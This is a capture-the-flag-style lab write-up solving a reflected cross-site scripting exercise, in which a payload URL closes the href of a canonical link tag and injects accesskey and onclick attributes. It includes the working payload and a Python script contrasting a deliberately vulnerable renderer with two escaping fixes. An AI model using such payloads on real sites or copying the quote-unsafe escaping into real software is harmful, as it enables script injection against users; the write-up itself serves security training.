Problem Statement

This lab reflects user input in a canonical link tag and escapes angle brackets.

To solve the lab, perform a cross-site scripting attack on the home page that injects an attribute that calls the alert function.

To assist with your exploit, you can assume that the simulated user will press the following key combinations:

Please note that the intended solution to this lab is only possible in Chrome.


Felix

Solution

Link elements: Access key attributes can enable XSS on normally unexploitable elements

<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
1. The lab description hints that the entry point is the canonical link tag, not the comment form.
2. The Burp Suite XSS cheat sheet lists the payload above under "Link elements": an accesskey attribute plus an event handler makes an element exploitable that normally cannot receive user interaction.
3. The entry point is reachable with a plain GET request: the URL used to visit the home page, query string included, is reflected into the href of the canonical link. Angle brackets are escaped, so a new tag cannot be opened, but single quotes are not, so the href attribute can be closed early and further attributes appended to the existing tag.
4. The template and the tag we want the response to contain:
<link rel="canonical" href='https://ac791fd81f18b495c14e124a00e700fc.web-security-academy.net/{}'/>
<link rel="canonical" href='https://ac791fd81f18b495c14e124a00e700fc.web-security-academy.net/?'accesskey='X'onclick='alert(1)'/>
5. Which we achieve by visiting:
https://ac791fd81f18b495c14e124a00e700fc.web-security-academy.net/?'accesskey='X'onclick='alert(1)
The leading ? keeps the payload in the query string so the request still routes to the home page, and the payload ends without a closing quote because the template's own '/> closes the onclick value. When the simulated user presses the access key combination (ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X), the element is activated and onclick fires; the lab notes this only works in Chrome.
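To make the attribute-injection mechanics concrete, here is an added example (not part of the original write-up or the lab's own code) that models the reflection with Python's standard-library HTML parser. The template shape and the "escape angle brackets only" filter are assumed from the snippets above; the two hardened renderers are my suggested fixes, not the lab's. The parser shows which attributes a browser-style tokenizer would assign to the link element for each variant.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Lab host copied from the write-up; the template shape (href in single quotes,
# tag closed with '/>') is assumed from the "what we want" snippet above.
HOST = "https://ac791fd81f18b495c14e124a00e700fc.web-security-academy.net/"

# The write-up's payload. The first ' closes href, then two attributes follow.
# No trailing quote is needed: the template's own "'/>" closes the onclick value.
PAYLOAD = "?'accesskey='X'onclick='alert(1)"


def escape_angle_brackets_only(value: str) -> str:
    """Assumed model of the lab's filter: blocks new tags, leaves quotes alone."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def render_vulnerable(request_path: str) -> str:
    """Reflect the requested path/query into the canonical href (vulnerable)."""
    return f"<link rel=\"canonical\" href='{HOST}{escape_angle_brackets_only(request_path)}'/>"


def render_hardened_html_escape(request_path: str) -> str:
    """Fix 1 (suggested here): HTML-encode quotes too, so href cannot be closed early."""
    return f"<link rel=\"canonical\" href='{HOST}{html.escape(request_path, quote=True)}'/>"


def render_hardened_url_encode(request_path: str) -> str:
    """Fix 2 (suggested here): treat the reflected value as a URL component and
    percent-encode everything except characters legal in a path/query."""
    return f"<link rel=\"canonical\" href='{HOST}{quote(request_path, safe='/?=&')}'/>"


class LinkAttrCollector(HTMLParser):
    """Records the attributes the parser assigns to each <link> element."""

    def __init__(self):
        super().__init__()
        self.links = []

    # <link .../> is reported via handle_startendtag, which by default
    # delegates to handle_starttag, so overriding this one is enough.
    def handle_starttag(self, tag, attrs):
        if tag == "link":
            self.links.append(dict(attrs))


def parse_link_attrs(markup: str) -> dict:
    """Return the attribute dict of the first <link> in markup ({} if none)."""
    p = LinkAttrCollector()
    p.feed(markup)
    p.close()
    return p.links[0] if p.links else {}


def has_injected_handler(markup: str) -> bool:
    """True when the reflected value produced an accesskey plus an on* handler."""
    attrs = parse_link_attrs(markup)
    return "accesskey" in attrs and any(name.startswith("on") for name in attrs)


if __name__ == "__main__":
    renderers = [
        ("vulnerable (angle brackets only)", render_vulnerable),
        ("hardened (html.escape, quote=True)", render_hardened_html_escape),
        ("hardened (percent-encoded)", render_hardened_url_encode),
    ]
    for label, render in renderers:
        out = render(PAYLOAD)
        print(label)
        print("  markup:     ", out)
        print("  parsed:     ", parse_link_attrs(out))
        print("  exploitable:", has_injected_handler(out))
```

Running it shows the vulnerable variant yielding four attributes (rel, href, accesskey, onclick) from what the server intended to be a single href, while both hardened variants keep the whole payload inside the href value. Note that the parser unescapes attribute values, so the HTML-escaped variant still carries the literal quotes inside href; they simply never reach the tokenizer as attribute delimiters.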

Proof

What have you learnt?

  1. I spent too much time finding the entry point. I thought it was the comment field (stored), but apparently it was hinted that it is the canonical link tag (reflected).
  2. The Burp Suite XSS cheat sheet is quite useful.
  3. To inject, use ? before the payload: abc.com/?